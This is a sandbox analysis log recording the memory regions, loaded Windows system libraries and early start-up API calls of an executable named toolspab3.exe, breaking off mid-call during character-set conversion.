# Flog Txt Version 1 # Analyzer Version: 4.3.1 # Analyzer Build Date: Nov 9 2021 05:55:33 # Log Creation Date: 01.12.2021 06:35:20.314 Process: id = "1" image_name = "toolspab3.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe" page_root = "0x45615000" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x664" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 124 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 126 start_va = 0x400000 end_va = 0x4d3fff monitored = 1 entry_point = 0x4194d0 region_type = mapped_file name = "toolspab3.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe") Region: id = 127 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 130 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 131 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 132 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 270 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 271 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 272 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 273 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x5d0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 276 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 280 start_va = 0x4e0000 end_va = 0x59dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 281 start_va = 0x73ee0000 end_va = 0x73f71fff monitored = 0 entry_point = 0x73f20380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 282 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 283 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 284 start_va = 0x5d0000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 285 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 286 start_va = 0x7c0000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 287 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 288 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 289 start_va = 0x30000 end_va = 0x38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 290 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 291 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 292 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 293 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 294 start_va = 0x5d0000 end_va = 0x5f9fff monitored = 0 entry_point = 0x5d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 295 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 296 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 297 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 298 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 299 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 300 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 301 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 302 start_va = 0x72d40000 end_va = 0x72db4fff monitored = 0 entry_point = 0x72d79a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 303 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 304 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 305 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 306 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 307 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 308 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 309 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 310 start_va = 0x1fe0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 311 start_va = 0x1fe0000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 312 start_va = 0x21a0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 313 start_va = 0x74120000 end_va = 0x7423efff monitored = 0 entry_point = 0x74165980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 314 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 315 start_va = 0x1fe0000 end_va = 0x209bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fe0000" filename = "" Region: id = 316 start_va = 0x2110000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 317 start_va = 0x5d0000 end_va = 0x5d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 318 start_va = 0x71430000 end_va = 0x7144cfff monitored = 0 entry_point = 0x71433b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 319 start_va = 0x5e0000 end_va = 0x5e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 335 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Thread: id = 1 os_tid = 0x12c8 [0073.917] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0073.917] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0073.917] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x680000 [0074.055] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0074.055] GetProcAddress (hModule=0x74530000, lpProcName="FlsAlloc") returned 0x7454a980 [0074.055] GetProcAddress (hModule=0x74530000, lpProcName="FlsGetValue") returned 0x74547570 [0074.055] GetProcAddress (hModule=0x74530000, lpProcName="FlsSetValue") returned 0x74549e30 [0074.055] GetProcAddress (hModule=0x74530000, lpProcName="FlsFree") returned 0x74554ff0 [0074.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x238) returned 0x6805a8 [0074.056] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74530000 [0074.056] GetCurrentThreadId () returned 0x12c8 [0074.057] GetStartupInfoW (in: lpStartupInfo=0x19fea0 | out: lpStartupInfo=0x19fea0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0074.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x824) returned 0x6807e8 [0074.057] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0074.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0074.057] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0074.057] SetHandleCount (uNumber=0x20) returned 0x20 [0074.057] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe\" " [0074.057] GetEnvironmentStringsW () returned 0x6cfea0* [0074.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa3e) returned 0x681018 [0074.057] FreeEnvironmentStringsW (penv=0x6cfea0) returned 1 [0074.057] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x44bf28, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe")) returned 0x2b [0074.057] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x84) returned 0x681a60 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb4) returned 0x681af0 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x62) returned 0x681bb0 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x681c20 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x92) returned 0x681ca8 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9c) returned 0x681d48 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x86) returned 0x681df0 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x681e80 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6c) returned 0x681ed8 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3e) returned 0x681f50 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5e) returned 0x681f98 [0074.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x86) returned 0x682000 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4e) returned 0x682090 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x52) returned 0x6820e8 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x682148 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf6) returned 0x682190 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x682290 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5a) returned 0x682338 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5e) returned 0x6823a0 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb4) returned 0x682408 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x48) returned 0x6824c8 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x54) returned 0x682518 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5a) returned 0x682578 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6c) returned 0x6825e0 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x682658 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x6826d8 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfa) returned 0x682740 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x52) returned 0x682848 [0074.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x42) returned 0x6828a8 [0074.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x6828f8 [0074.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x78) returned 0x682950 [0074.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x6829d0 [0074.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x48) returned 0x682a50 [0074.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x66) returned 0x682aa0 [0074.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x682b10 [0074.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x68) returned 0x682b68 [0074.060] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x48) returned 0x682bd8 [0074.060] HeapValidate (hHeap=0x680000, dwFlags=0x0, lpMem=0x681018) returned 1 [0074.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x681018 | out: hHeap=0x680000) returned 1 [0074.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa4) returned 0x682c28 [0074.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x824) returned 0x681018 [0074.061] GetLastError () returned 0x0 [0074.061] SetLastError (dwErrCode=0x0) [0074.061] GetLastError () returned 0x0 [0074.061] SetLastError (dwErrCode=0x0) [0074.061] GetLastError () returned 0x0 [0074.061] SetLastError (dwErrCode=0x0) [0074.061] GetACP () returned 0x4e4 [0074.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x244) returned 0x682cd8 [0074.061] GetLastError () returned 0x0 [0074.061] SetLastError (dwErrCode=0x0) [0074.061] IsValidCodePage (CodePage=0x4e4) returned 1 [0074.061] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe48 | out: lpCPInfo=0x19fe48) returned 1 [0074.061] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f90c | out: lpCPInfo=0x19f90c) returned 1 [0074.062] GetLastError () returned 0x0 [0074.062] SetLastError (dwErrCode=0x0) [0074.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0074.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x22c) returned 0x682f28 [0074.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x682f50, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0074.062] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpCharType=0x19fc2c | out: lpCharType=0x19fc2c) returned 1 [0074.062] HeapValidate (hHeap=0x680000, dwFlags=0x0, lpMem=0x682f28) returned 1 [0074.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x682f28 | out: hHeap=0x680000) returned 1 [0074.062] GetLastError () returned 0x0 [0074.062] SetLastError (dwErrCode=0x0) [0074.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0074.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x22c) returned 0x682f28 [0074.062] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19f924, cbMultiByte=256, lpWideCharStr=0x682f50, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0074.062] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0074.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x22c) returned 0x683160 [0074.063] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchSrc=256, lpDestStr=0x683188, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽") returned 256 [0074.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽", cchWideChar=256, 